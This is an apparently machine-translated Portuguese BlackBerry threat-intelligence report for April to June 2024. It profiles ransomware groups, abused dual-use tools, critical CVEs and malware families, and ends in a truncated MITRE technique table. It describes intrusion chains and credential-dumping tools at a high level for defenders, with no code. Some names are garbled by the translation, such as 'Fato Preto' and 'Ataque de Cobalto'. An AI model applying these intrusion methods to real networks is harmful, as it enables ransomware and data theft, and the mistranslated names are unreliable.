Conforme destacado neste relatório, os criminosos cibernéticos, incluindo grupos patrocinados pelo Estado, têm cada vez mais como alvo a infraestrutura essencial. Incidentes de intenção maliciosa ou criminosa de interromper serviços ou pedir resgate a operadores e proprietários de infraestrutura essencial dispararam globalmente nos últimos anos. No período deste relatório, o site BlackBerry documentou mais de 800.000 ataques contra infraestruturas essenciais, sendo que 50% foram direcionados ao setor financeiro. Os perpetradores estão cientes da importância desses serviços e procuram maximizar seus esforços para obter resgate, buscando causar, ou ameaçando causar, o máximo de interrupção nesses serviços.
Grandes eventos esportivos internacionais, como as Olimpíadas e a Copa do Mundo da FIFA, também se tornaram o foco de ameaças cibernéticas. Antecipando um aumento drástico na atividade cibernética maliciosa, o Centro de Segurança Cibernética do Canadá divulgou um boletim de ameaças cibernéticas em maio de 2024, avaliando que "os criminosos cibernéticos muito provavelmente terão como alvo grandes organizações associadas a grandes eventos esportivos internacionais e empresas locais em torno de grandes eventos esportivos por meio de comprometimento de e-mail comercial e ataques de ransomware". Ele também alertou os participantes e espectadores para ficarem atentos a e-mails de phishing e sites mal-intencionados que usam esses eventos como iscas para ataques.
De fato, após o término dos jogos olímpicos, as autoridades francesas relataram mais de 140 ataques cibernéticos vinculados aos Jogos Olímpicos de 2024, sendo todos caracterizados como de "baixo impacto". No entanto, dadas as tendências durante as Olimpíadas anteriores, esse número provavelmente é uma grande subestimação. Por exemplo, durante os Jogos Olímpicos de Tóquio, realizados em 2021, os organizadores relataram 450 milhões de ataques cibernéticos.
Como o Fórum Econômico Mundial (WEF) observou em seu Global Cybersecurity Outlook 2024, os governos e as empresas lutam para manter a resiliência cibernética contra ameaças cibernéticas cada vez mais sofisticadas e em rápida escalada, que podem causar grandes interrupções. Além disso, há uma grande divergência na capacidade das organizações de se protegerem. De acordo com o WEF, enquanto 85% das organizações com 100.000 ou mais funcionários têm seguro cibernético, menos de 21% das organizações com menos de 250 funcionários têm seguro cibernético. Em suma, as menores organizações têm mais do que "duas vezes mais chances do que as maiores de dizer que não têm a resiliência cibernética de que precisam para atender aos seus requisitos operacionais críticos mínimos". Esse desequilíbrio entre organizações grandes e pequenas precisa ser resolvido.
Embora a acessibilidade das tecnologias cibernéticas tenha sido destacada como um fator crítico, o mesmo ocorreu com a educação e a conscientização cibernética. É por isso que, além de fornecer soluções de segurança acessíveis, a BlackBerry está investindo em educação cibernética. Em março de 2024, aBlackBerry inaugurou seu primeiro Centro de Excelência em Segurança Cibernética (CCoE) na Malásia. O CCoE oferecerá treinamento excepcional em segurança cibernética e inteligência contra ameaças para ajudar a Malásia e os governos e organizações parceiros na região do Indo-Pacífico a prevenir, deter e responder melhor às ameaças cibernéticas que enfrentam.
É preciso fazer mais para elevar o nível da segurança cibernética e compensar a escassez global de cerca de quatro milhões de profissionais cibernéticos treinados. À medida que mais organizações e setores dependem de tecnologias digitais e baseadas em nuvem, a necessidade de uma abordagem robusta e multifacetada para a segurança cibernética torna-se crucial.
Limelight da aplicação da lei
Aprimorando as capacidades de aplicação da lei: Suporte Especializado do NC3
O Centro Nacional de Coordenação de Crimes Cibernéticos (NC3) foi fundado em 2020 em resposta à Estratégia Nacional de Segurança Cibernética do Canadá de 2018. Sob a administração da Real Polícia Montada do Canadá, esse serviço policial nacional tem o mandato de ajudar a reduzir a ameaça, o impacto e a vitimização causados pelo crime cibernético no Canadá. Ele fornece suporte especializado a todos os serviços policiais canadenses e emprega tanto policiais quanto civis com diversas habilidades para fornecer o conhecimento técnico e investigativo necessário para analisar com eficácia crimes sofisticados. O NC3 fornece serviços especializados para apoiar os parceiros de aplicação da lei, tais como:
- Inteligência sobre crimes cibernéticos
- Consultoria e orientação técnica
- Desenvolvimento de ferramentas
- Análise comportamental
- Rastreamento de criptomoedas
O NC3 trabalha em estreita colaboração com as forças policiais nacionais e internacionais, parceiros governamentais, setor privado e universidades para melhorar continuamente a resposta das forças policiais canadenses ao crime cibernético.
A prevalência do ransomware
Principais ameaças de ransomware no Canadá
O NC3 realiza avaliações regulares para identificar as principais ameaças de ransomware no Canadá. A avaliação mais recente abrangeu incidentes de 1º de janeiro de 2024 a 30 de abril de 2024. A figura abaixo apresenta as dez principais ameaças de ransomware para esse período.
Apesar da prevalência do ransomware, a maioria dos crimes cibernéticos não é denunciada. Estima-se que apenas cerca de 10% dos crimes cibernéticos sejam denunciados às autoridades canadenses. Essa subnotificação torna difícil entender completamente a prevalência e o impacto do crime cibernético no país.
Um crime pouco relatado
Destaque da história cibernética: Ransomware chega aos céus
O ransomware Akira tem como alvo o setor de companhias aéreas da América Latina
Em junho de 2024, os pesquisadores do BlackBerry investigaram um ataque do Storm-1567 usando o ransomware Akira contra uma companhia aérea latino-americana. Essa gangue com fins financeiros, conhecida por táticas de extorsão dupla, inicialmente acessou a rede via SSH e exfiltrou dados cruciais antes de implantar o Akira. Notável por explorar sistemas desatualizados e abusar de software legítimo, o Storm-1567 tem como alvo as pequenas e médias empresas em todo o mundo, atacando mais de 250 organizações e acumulando mais de US$ 42 milhões em resgate até janeiro de 2024.
Análise e comentários da resposta a incidentes
A equipe de resposta a incidentes (IR) do site BlackBerry monitora regularmente os incidentes em que o vetor inicial de infecção é um dispositivo conectado à Internet. Ataques cibernéticos a dispositivos vulneráveis, como dispositivos mal configurados ou com senhas definidas de fábrica, são comuns. Equipes de segurança corporativa sobrecarregadas muitas vezes não conseguem proteger adequadamente todos os seus dispositivos de Internet (impressoras de rede e câmeras da Web de laptops, por exemplo). Além disso, funções cada vez mais importantes estão sendo incorporadas aos dispositivos, como dispositivos de rede e firewall.
Neste trimestre, a equipe de RI encontrou vulnerabilidades em versões desatualizadas do Cisco Adaptive Security Appliances (ASA) e em dispositivos com o software PAN-OS da Palo Alto Networks. Dispositivos de Internet desprotegidos ou mal configurados podem permitir que ladrões cibernéticos implantem ransomware no ambiente da empresa e extraiam seus dados. Isso destaca a necessidade de as empresas aplicarem atualizações de segurança a todos os sistemas expostos à Internet e fazerem isso em tempo hábil.(MITRE - Serviços Remotos Externos)
A equipe observou vários incidentes em que o agente não autorizado conseguiu acessar os recursos de nuvem da empresa. As duas situações recentes detalhadas abaixo ressaltam a importância de atualizações regulares do sistema e medidas robustas de segurança de rede.
- Incidente 1: durante uma violação de segurança cibernética, os agentes de ameaças exploraram uma série de vulnerabilidades em um Cisco ASA desatualizado para obter acesso não autorizado à rede privada virtual (VPN) da empresa. Uma vez dentro da rede, eles utilizaram o protocolo RDP (Remote Desktop Protocol) da Microsoft para se infiltrar no controlador de domínio, o que lhes permitiu obter uma lista abrangente de usuários e grupos dentro do domínio. Utilizando ferramentas como o netscan e o software Advanced IP Scanner, os agentes da ameaça realizaram uma varredura completa da rede para mapear a infraestrutura. Posteriormente, os invasores exfiltraram toda a pasta "C:\Users" que continha dados críticos do usuário e, em seguida, implantaram o ransomware Akira, causando interrupção significativa e perda de dados.
- Incidente 2: um cliente recebeu alertas de segurança alarmantes de seus controladores de domínio, sinalizando acesso não autorizado. A investigação revelou que os agentes da ameaça haviam explorado vulnerabilidades em um dispositivo Cisco ASA desatualizado e em fim de vida útil para se infiltrar na rede. Uma vez dentro, o invasor implantou o ransomware BlackSuit, causando uma interrupção significativa nas operações do cliente.
Esses incidentes destacam a necessidade de as empresas implementarem controles de segurança de autenticação fortes em todos os sistemas.(MITRE - Contas válidas: contas na nuvem)
Destaque da história cibernética: Violação maciça de dados expõe 2,9 bilhões de registros
Quatro terabytes de dados altamente pessoais roubados de cidadãos dos EUA, do Reino Unido e do Canadá.
Em abril, foi publicado um tópico de vendas no famoso site clandestino de crimes cibernéticos BreachForums relacionado a um suposto vazamento dos registros pessoais de "toda a população dos EUA, da Califórnia e do Reino Unido". A postagem afirmava que quatro terabytes de dados haviam sido roubados, consistindo em informações de identificação pessoal altamente confidenciais, como nomes completos, endereços de correspondência, números de telefone e até mesmo números de seguro social (SSNs) de cidadãos americanos, bem como de pessoas do Reino Unido e do Canadá.
O agente de ameaças conhecido como USDoD alegou ter roubado mais de 2,9 bilhões de linhas de registros e exigiu uma taxa substancial de US$ 3,5 milhões pelas informações vazadas nesse grande conjunto de dados.
Esse pedido de resgate acabou não tendo êxito e, em julho, 4 terabytes de dados foram liberados gratuitamente pelo BreachForums. Esses dados consistiam em mais de 137 milhões de endereços de e-mail, 272 milhões de SSNs e muito mais. Acredita-se que a causa do vazamento esteja relacionada ao RecordsCheck.net, um site subsidiário do corretor de dados e serviço de verificação de antecedentes National Public Data (NPD), que inadvertidamente publicou as senhas de seu banco de dados back-end em um arquivo de texto simples que estava disponível gratuitamente em sua página inicial - um descuido crítico de segurança que acabou sendo descoberto e explorado pelo agente da ameaça.
Em uma declaração formal, a NPD reconheceu uma tentativa no final de 2023 de acessar seus registros; no entanto, não mencionou a extensão dos registros que poderiam ter sido afetados.
Embora o vazamento tenha sido recente, os dados em si se estendem por décadas, o que significa que uma porcentagem das vítimas afetadas por esse vazamento pode já ter falecido, e alguns dados do vazamento provavelmente estão desatualizados. Também é importante observar que uma pessoa pode ter muitos registros diferentes, cada um relacionado a endereços e nomes anteriores associados a essa pessoa. Isso significa que o número de pessoas afetadas por esse vazamento provavelmente será muito menor do que a alegação errônea da mídia anterior de que 3 bilhões de pessoas podem ter sido afetadas.
No entanto, dado o grande volume de dados de PII, esse se tornou um dos maiores vazamentos de dados já registrados nos Estados Unidos e deve ser motivo de preocupação para todas as vítimas sediadas nos EUA. É muito provável que esses dados roubados sejam aproveitados e transformados em armas por muitos outros agentes de ameaças nos próximos meses, à medida que as consequências desse desastre forem se estabelecendo. Portanto, é importante que todos os cidadãos monitorem ativamente seus relatórios de crédito em busca de atividades fraudulentas e as denunciem às agências de crédito, se detectadas.
-
Atores de ameaça e ferramentas
Além dos agentes de ameaças observados em nossas investigações e descobertas internas, vários outros grupos lançaram vários ataques cibernéticos neste trimestre. Esses grupos geralmente empregam uma série de ferramentas e malware para executar suas atividades ilícitas. Aqui, destacamos alguns dos atacantes mais impactantes e ferramentas notáveis identificados por nossa Equipe de Pesquisa e Inteligência sobre Ameaças neste trimestre.
-
Fato Preto
O BlackSuit é uma operação privada de ransomware que surgiu em abril de 2023. Esse grupo emprega uma estratégia de extorsão multifacetada, envolvendo tanto a exfiltração quanto a criptografia dos dados das vítimas. Eles também mantêm sites de vazamento de dados na dark web, onde os dados confidenciais roubados de vítimas que não estão em conformidade são postados publicamente. O BlackSuit tem como alvo organizações de todos os tamanhos em vários setores, incluindo saúde, educação, tecnologia da informação (TI), governo, varejo e manufatura.
Os métodos de ataque do BlackSuit incluem e-mails de phishing, arquivos torrent maliciosos e exploração de vulnerabilidades em VPNs e firewalls. O grupo utiliza uma combinação de ferramentas legítimas e mal-intencionadas, como Cobalt Strike, WinRAR, PuTTY, Rclone, Advanced IP Scanner, Mimikatz, PsExec, Rubeus e GMER para movimentação lateral e despejo de credenciais. Suas cargas úteis de ransomware são projetadas para atingir os sistemas operacionais Windows® e Linux® e, em alguns casos, servidores VMware ESXi.
O Departamento de Saúde e Serviços Humanos dos EUA destacou as semelhanças entre o BlackSuit e o Royal ransomware, sugerindo que o BlackSuit pode ter se originado do criador do Royal, o famoso grupo Conti. Os mecanismos de criptografia e os parâmetros de linha de comando usados pelo BlackSuit têm uma semelhança impressionante com os encontrados no Royal, indicando uma base de código compartilhada.
As metas para esse período incluem:
- Kadokawa Corporation, um conglomerado de mídia japonês, onde o grupo se disfarçou como um componente legítimo do software antivírus Qihoo 360.
- Outros alvos notáveis incluem a cidade de Cedar Falls, em Iowa; uma empresa multinacional americana de software; o Departamento de Polícia de Kansas City, no Kansas; e a empresa farmacêutica global Octapharma Plasma, Inc.
-
BlackBasta
O BlackBasta (também conhecido como Black Basta) é um operador de ransomware e uma empresa criminosa de ransomware como serviço (RaaS) que surgiu no início de 2022. De acordo com um relatório conjunto da CISA e do FBI, as afiliadas do BlackBasta visaram mais de 500 entidades do setor privado e de infraestrutura crítica, incluindo organizações de saúde, na América do Norte, Europa e Austrália.
O BlackBasta emprega métodos típicos de acesso inicial, incluindo phishing e exploração de vulnerabilidades conhecidas. Depois de obter acesso, os adversários realizam o reconhecimento para mapear a rede de destino e despejar as credenciais usando o Mimikatz. Usando as credenciais coletadas, os operadores de ransomware aumentam os privilégios e se movem lateralmente para comprometer a rede. Antes da criptografia, os agentes de ameaças do BlackBasta desativam as defesas, exfiltram informações confidenciais e excluem cópias do volume de sombra para permanecerem ocultos até o ataque final. O grupo é conhecido por empregar táticas de extorsão dupla, criptografando dados críticos e servidores vitais e ameaçando publicar informações confidenciais em seu site público de vazamentos.
As metas deste período do relatório incluem:
- Um importante provedor de serviços de saúde dos EUA. O BlackBasta criptografou os dados dos pacientes do provedor e seus sistemas operacionais, comprometendo o atendimento aos pacientes e a privacidade dos dados.
- Keytronic, um fabricante dos EUA. Um ataque cibernético atribuído pela BlackBasta interrompeu suas operações e restringiu o acesso a aplicativos comerciais essenciais. Além disso, a empresa sofreu uma violação de dados quando a quadrilha de ransomware vazou os dados roubados.
Esses ataques destacam o foco contínuo do BlackBasta em alvos de alto valor em vários setores, empregando táticas sofisticadas de ransomware para maximizar seu potencial de interrupção e extorsão.
-
LockBit
O LockBit, um grupo de criminosos cibernéticos com supostas afiliações à Rússia, é especializado como provedor de RaaS por meio de seu malware homônimo. Os operadores do grupo mantêm e aprimoram diligentemente o ransomware, supervisionando as negociações e orquestrando sua implementação quando ocorre uma violação bem-sucedida. O LockBit emprega uma estratégia de extorsão dupla que não apenas criptografa os dados locais para restringir o acesso da vítima, mas também exfiltra informações confidenciais, ameaçando a exposição pública dos dados, a menos que o resgate seja pago.
A Operação Cronos, uma força-tarefa internacional de crimes cibernéticos, interrompeu gravemente a LockBit em fevereiro. No entanto, o grupo permaneceu altamente ativo e foi o mais agressivo na segmentação de organizações da EMEA neste trimestre. Os alvos incluem:
- Infraestrutura crítica localizada. Na região EMEA, a LockBit tem como alvo principal as PMEs em massa, principalmente no Reino Unido, na Alemanha e na França. O grupo se concentra principalmente em alvos de infraestrutura crítica de pequena escala relacionados à educação, à saúde e ao setor público.
- Hôpital de Cannes - Simone Veil, na França. Um ataque do LockBit levou a graves interrupções operacionais, obrigando o hospital a colocar todos os computadores off-line e a reagendar procedimentos e consultas não emergenciais.
- Wichita, a maior cidade do Kansas, com uma população de 400.000 habitantes. Esse ataque significativo de ransomware forçou a cidade a colocar seus sistemas de computador off-line, causando uma interrupção generalizada. A LockBit publicou publicamente um prazo de resgate em seu site, aumentando a pressão sobre a administração da cidade para atender às suas exigências.
-
ShinyHunters
O ShinyHunters é um grupo de ameaças que surgiu pela primeira vez em 2020 e é conhecido por diversas violações de dados em vários setores. Seus ataques supostamente incluem aqueles contra a empresa indonésia de comércio eletrônico Tokopedia, bem como contra o GitHub e a Pizza Hut Australia. O ShinyHunters ofereceu dados roubados para venda em fóruns, ocasionalmente vazando dados de algumas violações gratuitamente. Ironicamente, o grupo frequentemente encontra vulnerabilidades por meio de códigos disponíveis nos repositórios do GitHub. Ele vasculha buckets de nuvem não seguros, abusa de credenciais roubadas e aproveita ataques de phishing para facilitar suas violações.
Outros alvos alegados para esse período de relatório incluem:
- Banco Santander S.A., um banco espanhol que atende clientes na América Latina, nos Estados Unidos, no Reino Unido e na Espanha. A ShinyHunters colocou os dados dessa violação à venda por aproximadamente US$ 2 milhões, afetando 30 milhões de clientes e funcionários.
- Uma empresa multinacional de venda e distribuição de ingressos de entretenimento. Seus clientes tiveram seus dados roubados por meio de uma conta no Snowflake, uma nuvem de dados de IA usada pela empresa. A conta não tinha autenticação multifator, o que permitiu o acesso do grupo de ameaças. A ShinyHunters se ofereceu para vender esses dados por US$ 500.000.
-
Akira
O ransomware Akira foi observado pela primeira vez em março de 2023 e rapidamente ganhou notoriedade devido a seus ataques abrangentes em vários setores. As operações do grupo foram caracterizadas por uma série de ataques de alto perfil e uma presença persistente no cenário de ransomware. O Akira é particularmente conhecido pelo uso de táticas de extorsão dupla, em que ele não apenas criptografa os dados, mas também ameaça vazar os dados roubados se o resgate não for pago. Essa abordagem tem se mostrado eficaz para forçar as vítimas a atender às suas exigências.
Inicialmente focado em sistemas Windows, o Akira expandiu suas operações para incluir uma variante Linux. O grupo emprega métodos comuns de acesso inicial, incluindo campanhas de phishing e exploração de vulnerabilidades conhecidas. O Akira também utiliza ferramentas disponíveis publicamente, como Mimikatz e LaZagne para acesso a credenciais, PsExec para execução remota e AnyDesk ou Radmin para acesso remoto.
O Akira opera como um RaaS, foi inicialmente desenvolvido em C++ e usa uma extensão .akira para arquivos criptografados. Também foi observada uma variante baseada em Rust, que usa a extensão .powerranges. As atividades mais recentes do Akira tiveram como alvo os setores de saúde, serviços financeiros, manufatura e tecnologia. Esses ataques destacam a capacidade de adaptação do grupo e a ameaça contínua a uma ampla gama de setores.
-
Ferramentas
Ferramentas como Rclone, Rubeus, GMER, WinSCP e Cobalt Strike são vitais para o gerenciamento de dados, testes de penetração e manutenção de sistemas. Sua flexibilidade e acessibilidade também as tornam ferramentas úteis para serem usadas indevidamente por agentes de ameaças.
-
Rclone
O Rclone é um programa de linha de comando que facilita a sincronização, a cópia, a movimentação ou o espelhamento de dados entre um computador local e um armazenamento remoto. O Rclone fornece back-ends que podem oferecer suporte a vários serviços e plataformas de código aberto e proprietários, incluindo HTTP, FTP ou SMB, bem como Google Drive, MEGA, Dropbox e outros. Essa flexibilidade torna o Rclone prático para o usuário legítimo, mas também o torna ideal para agentes de ameaças que buscam um meio de exfiltrar dados para seu serviço de nuvem. Ele tem sido usado por muitos agentes de ransomware ao longo dos anos, incluindo alguns que estavam ativos neste trimestre, como Akira, BlackBasta e LockBit. -
Rubeus
O Rubeus é uma ferramenta de código aberto adaptada do conhecido projeto Kekeo, de Benjamin Delpy, e é usado para interações e abusos brutos do Kerberos, incluindo recuperação e renovação de tíquetes, abuso de delegação restrita, falsificação de tíquetes, gerenciamento, exfiltração, coleta e kerberoasting. Atualmente, ele é usado com frequência por agentes mal-intencionados como parte de estruturas de ataque maiores e se integra a ferramentas como o Sliver C2, que oferece suporte a implantes entre plataformas e vários protocolos de comunicação. -
GMER
O GMER é um aplicativo desenvolvido para detectar e remover rootkits por meio da varredura de processos, threads, módulos, serviços, arquivos e chaves de registro ocultos. Ele também executa hooking em linha e hooks na Tabela de Descritores de Interrupção (IDT), na Tabela de Descritores de Serviços do Sistema (SSDT) e nas chamadas de Pacote de Solicitação de Entrada/Saída (IRP). Embora o GMER seja normalmente uma ferramenta benigna usada para detectar e remover drivers prejudiciais do kernel, ele também foi explorado para contornar as medidas de segurança. Por exemplo, os grupos de ransomware Play e BlackSuit usaram o GMER para neutralizar as defesas de segurança e garantir a execução da carga útil sem interferência. -
WinSCP
O Windows Secure Copy (WinSCP) é um cliente gratuito de código aberto para os protocolos SFTP, FTP, WebDAV e SCP, projetado para o Microsoft Windows. Ele facilita a transferência segura de arquivos entre computadores locais e remotos, aproveitando protocolos criptografados como o SFTP para garantir a segurança dos dados. No entanto, seus recursos também o tornam a ferramenta preferida dos agentes de ameaças. Os invasores podem usar o WinSCP para exfiltrar furtivamente grandes volumes de dados, fazer upload de malware para servidores-alvo para comprometer ainda mais o sistema e obter acesso remoto para executar comandos arbitrários ou implantar software mal-intencionado adicional, mantendo controle persistente sobre sistemas comprometidos. -
Ataque de Cobalto
O Cobalt Strike funciona como uma estrutura sofisticada de simulação de adversários, meticulosamente projetada para replicar a presença persistente de agentes de ameaças em ambientes de rede. Estruturado em torno de dois componentes essenciais - um agente (Beacon) e um servidor (Team Server) - o Cobalt Strike orquestra uma interação perfeita. O Cobalt Strike Team Server, que funciona como um servidor C2 de longo prazo hospedado na Internet, mantém comunicação constante com as cargas úteis do Beacon implantadas nas máquinas das vítimas.
Embora o Cobalt Strike seja utilizado principalmente como uma ferramenta para testadores de penetração e equipes vermelhas avaliarem a postura de segurança das redes, infelizmente ele também foi explorado por agentes de ameaças mal-intencionados. Apesar da finalidade pretendida, ocorreram casos de vazamento de seu código on-line, o que levou a um rápido armamento por uma gama diversificada de adversários. Essa natureza dupla destaca a importância da vigilância e de medidas robustas de segurança cibernética para atenuar os riscos associados ao seu uso indevido, protegendo as redes contra possíveis explorações.
Destaque da história cibernética: Grupo emergente de ransomware - Space Bears
Em um cenário de ameaças cibernéticas saturado de gangues de ransomware, visar organizações legítimas continua sendo lucrativo para os criminosos cibernéticos. Novos grupos frequentemente surgem ou se originam de gangues antigas, muitas vezes iniciando operações com uma variedade de ransomware nova ou aprimorada e um modus operandi que normalmente segue métodos testados e comprovados de agentes de ameaças anteriores.
Um desses grupos que surgiu neste período do relatório é o Space Bears, conhecido por seu site de vazamentos elegante e polido. Alguns pesquisadores sugerem que eles podem ter ligações com os operadores do Phobos RaaS.
Quem são os Ursos do Espaço?
Como a maioria das gangues de ransomware atuais, o Space Bears emprega um método de extorsão dupla. Ao entrar na rede da vítima, eles primeiro exfiltram e depois criptografam dados confidenciais, pressionando a vítima a pagar um resgate. O Space Bears pode ameaçar divulgar publicamente os dados na Internet se o resgate não for pago.
As referências aos dados roubados são publicadas em seu site de vazamento, localizado em um endereço ".onion" na deep web. O Projeto Tor, comumente chamado de "The Onion Router", é uma ferramenta de privacidade de código aberto que mantém a atividade on-line do usuário anônima e segura. A vítima é nomeada e envergonhada nesse site de vazamento, com um cronômetro de contagem regressiva exibido até a liberação dos dados, caso ela não pague o resgate dentro do prazo especificado. Desde que se tornou ativo, em meados de abril, esse grupo já atacou mais de 20 vítimas em vários setores globais.
Setores-alvo e geolocalização dos ursos espaciais
Vulnerabilidades e exposições comuns
Os CVEs (Common Vulnerabilities and Exposures, vulnerabilidades e exposições comuns notáveis) fornecem uma estrutura para identificar, padronizar e divulgar vulnerabilidades e exposições de segurança conhecidas. Quase 12.011 novos CVEs foram relatados pelo National Institute of Standards and Technology (NIST) de abril a junho de 2024. Isso representa um aumento de quase 35% nas vulnerabilidades divulgadas em relação a um período semelhante de janeiro a março de 2024.
O mês de maio detém o recorde até agora neste ano para o maior número de CVEs recém-descobertos, com cerca de 5.103 novos CVEs, quebrando todos os números registrados no primeiro trimestre do ano. Esses números incluem:
Palo Alto PAN-OS RCE
CVE-2024-3400 (10.0 Crítico) Execução de código arbitrário
De acordo com a Palo Alto, esse problema é aplicável aos firewalls PAN-OS 10.2, PAN-OS 11.0 e PAN-OS 11.1 configurados com gateway GlobalProtect ou portais GlobalProtect. O CVE está relacionado à injeção de comando como resultado de uma vulnerabilidade de criação de arquivo arbitrário no recurso GlobalProtect do software PAN-OS da Palo Alto Networks. Essa vulnerabilidade poderia permitir que um invasor não autenticado executasse um código arbitrário com privilégios de root no firewall. Devido a esse potencial, o CVE recebeu a pontuação crítica mais alta.
Estrutura do PyTorch vulnerável a RCE
CVE-2024-5480 (10.0 Crítico) Execução de código arbitrário
Uma vulnerabilidade na estrutura 'torch.distributed.rpc' do PyTorch, especificamente nas versões anteriores à 2.2.2, permite a execução remota de código (RCE). Essa vulnerabilidade permite que os invasores executem comandos arbitrários aproveitando as funções integradas do Python.
Divulgação de informações do Quantum Gateway
Contorno de autenticaçãoCVE-2024-24919 (8.6 High)
Os dispositivos de rede de perímetro, como as VPNs, são os principais alvos dos hackers e dos patrocinadores avançados do Estado. A Check Point™ publicou um aviso de dia zero em 28 de maio de 2024, alertando os clientes de que uma vulnerabilidade em seus Security Gateways pode permitir que os invasores acessem informações confidenciais e obtenham privilégios de domínio. Essa vulnerabilidade permite que os hackers se movam lateralmente e obtenham mais privilégios de rede. Em um comunicado, a Check Point observou que houve uma série de tentativas de acesso não autorizado, com milhares de dispositivos em potencial afetados pela falha.
Ameaças predominantes por plataforma: Windows
Infostealer
O Lumma Stealer é um infostealer baseado em C que se concentra na exfiltração de dados privados e confidenciais do dispositivo da vítima, incluindo dados de carteira de criptomoedas e dados de extensão de navegador de autenticação de dois fatores (2FA).
Downloader
O GuLoader (também conhecido como CloudEyE) é um código de shell criptografado, envolto no Visual Basic 5 ou 6, para baixar cargas úteis adicionais de vários tipos.
Infostealer
O Agent Tesla é um cavalo de Troia baseado em .NET que é frequentemente vendido como MaaS e é usado principalmente para coleta de credenciais.
Infostealer
O RisePro usa vários métodos de distribuição para obter acesso aos dispositivos das vítimas e coletar dados confidenciais para enviar de volta a um servidor C2.
Infostealer
O RedLine Stealer usa uma ampla gama de aplicativos e serviços para coletar informações da vítima, como senhas, cookies e informações de cartão de crédito.
Trojan de acesso remoto
Remcos, abreviação de controle e vigilância remotos, é um aplicativo usado para acessar remotamente o dispositivo de uma vítima.
Trojan de acesso remoto
O DCRat é um trojan de acesso remoto que rouba informações da vítima e executa comandos de um servidor C2. O DCRat foi observado sendo distribuído via Signal.
Botnet
O Amadey é um botnet que coleta informações da vítima e aguarda comandos de um servidor C2 para fazer o download de cargas úteis adicionais.
Ameaças predominantes por plataforma: Linux
Troiano
O trojan XorDDos mantém sua prevalência em nossa telemetria neste período do relatório. Usando a criptografia XOR para controlar o acesso aos dados de comunicação e execução, o XorDDos infecta dispositivos baseados em Linux e os controla como um botnet singular por meio de instruções C2.
Porta dos fundos
O BPFDoor é um backdoor do Linux que utiliza um sniffer do Berkeley Packet Filter (BPF) para interceptar e modificar o tráfego de rede. O BPFDoor tem sido usado como uma ferramenta de vigilância passiva pelo grupo de agentes de ameaças Red Menshen devido à sua capacidade de contornar firewalls e não ser detectado. Novas variantes do BPFDoor adotaram a comunicação reverse shell e reforçaram a criptografia.
Botnet
A Mirai foi detectada utilizando uma falha de desvio de autenticação para obter acesso a endpoints, juntamente com uma vulnerabilidade de injeção de comando para fornecer e implantar o botnet e assumir o controle de dispositivos vulneráveis.
Botnet
O Bashlite, também conhecido como Gafgyt, é outro botnet Linux que usa servidores C2 para enviar instruções a serem executadas por seus dispositivos infectados. Ele foi documentado como tendo como alvo dispositivos da Internet das Coisas (IoT), como roteadores, que ele usa para coordenar ataques DDoS em grande escala contra alvos.
Coinminer
O XMRig continua sendo uma ferramenta popular para mineração de criptomoedas, como o Monero, devido ao seu alto desempenho e à sua natureza de código aberto. Ele é frequentemente implantado por agentes de ameaças depois que o acesso inicial a um sistema é obtido e usado para minerar criptomoedas sem o conhecimento da vítima.
Ameaças predominantes por plataforma: macOS
Roubador
Descoberto e nomeado pela equipe de pesquisa de ameaças da Kandji em abril, o Cuckoo Stealer é distribuído como um arquivo de imagem de disco (DMG) malicioso que contém spyware e recursos de roubo de informações. Desde que foi descoberto, o Cuckoo Stealer registrou um aumento acentuado no número de novas amostras do malware que apareceram na natureza.
Roubador
O Atomic Stealer (também conhecido como AMOS) continua prevalecendo com muitas novas variantes detectadas na natureza. As novas variantes se disfarçam como vários aplicativos que são distribuídos por meio de imagens de disco. O AMOS é um ladrão que tem como alvo senhas, cookies de navegador, dados de preenchimento automático, carteiras de criptografia e dados de chaveiro do Mac.
Porta dos fundos
Um ataque malicioso que utiliza o Python Package Index (PyPI) foi descoberto por pesquisadores. O malware utiliza a biblioteca PyPI para instalar um payload Sliver C2 na máquina de destino. O pacote é escrito na linguagem de programação Go e usa esteganografia em um arquivo PNG (Portable Networks Graphic) para realizar o ataque.
Roubador
Esse malware se espalha utilizando anúncios maliciosos do Google para o navegador Arc. Esses anúncios induzem a vítima a baixar um arquivo instalador DMG malicioso que inicia o processo de infecção, instalando o malware na máquina. O Poseidon tem a capacidade de coletar credenciais de usuário, configurações de VPN e carteiras de criptomoedas.
Ameaças predominantes por plataforma: Android
Infostealer
Esse infostealer utiliza o Serviço de Acessibilidade do Android para capturar dados do usuário e enviar os dados capturados para seu servidor C2. O SpyNote inclui a funcionalidade de clicar/longar o clique, fazer capturas de tela e bloquear a tela da vítima.
Backdoor/Ransomware
O Rafel RAT é distribuído como um aplicativo trojan ou por meio de campanhas de phishing. Seus recursos incluem C2, rastreamento de localização, redirecionamento de notificações de dispositivos e extração de mensagens SMS pessoais e registros de chamadas do dispositivo de destino.
Infostealer
O SoumniBot rouba chaves bancárias e saqueia as contas bancárias das vítimas. O malware explora um problema de validação no manifesto do Android e rouba informações que são carregadas em um servidor remoto.
Infostealer
O Vultur foi distribuído por meio de aplicativos de cavalos de troia e técnicas de engenharia social de "smishing" (phishing por SMS). Além da exfiltração de dados, um agente de ameaças pode usar o Vultur para fazer alterações no sistema de arquivos, modificar as permissões de execução e controlar o dispositivo infectado usando o Android Accessibility Services.
Técnicas comuns do MITRE
Compreender as técnicas de alto nível dos grupos de ameaças pode ajudar a decidir quais técnicas de detecção devem ser priorizadas. O site BlackBerry observou as seguintes 20 principais técnicas sendo usadas por agentes de ameaças nesse período do relatório.
Técnicas detectadas
A tabela a seguir mostra as 20 principais técnicas. Uma seta para cima (↑) na coluna "mudança" indica que o uso da técnica aumentou desde nosso último relatório. Uma seta para baixo (↓) indica que o uso diminuiu desde nosso último relatório. Um símbolo de igual (=) significa que a técnica permanece na mesma posição que em nosso último relatório.
| Nome da técnica | ID da técnica | Nome da tática | Último relatório | Mudança |
|---|---|---|---|---|
|
Fluxo de execução do Hijack
|
T1574
|
Persistência, escalonamento de privilégios, evasão de defesa
|
NA
|
↑
|
|
Carregamento lateral de DLL
|
T1574.002
|
Persistência, escalonamento de privilégios, evasão de defesa
|
3
|
↑
|
|
Injeção de processo
|
T1055
|
Escalonamento de privilégios, evasão de defesa
|
1
|
↓
|
|
Captura de entrada
|
T1056
|
Acesso a credenciais, coleta
|
4
|
=
|
|
Descoberta de informações do sistema
|
T1082
|
Descoberta
|
2
|
↓
|
|
Descoberta de software
|
T1518
|
Descoberta
|
NA
|
↑
|
|
Descoberta de software de segurança
|
T1518.001
|
Descoberta
|
5
|
↓
|
|
Descoberta de processos
|
T1057
|
Descoberta
|
8
|
↓
|
|
Descoberta de arquivos e diretórios
|
T1083
|
Descoberta
|
7
|
↓
|
|
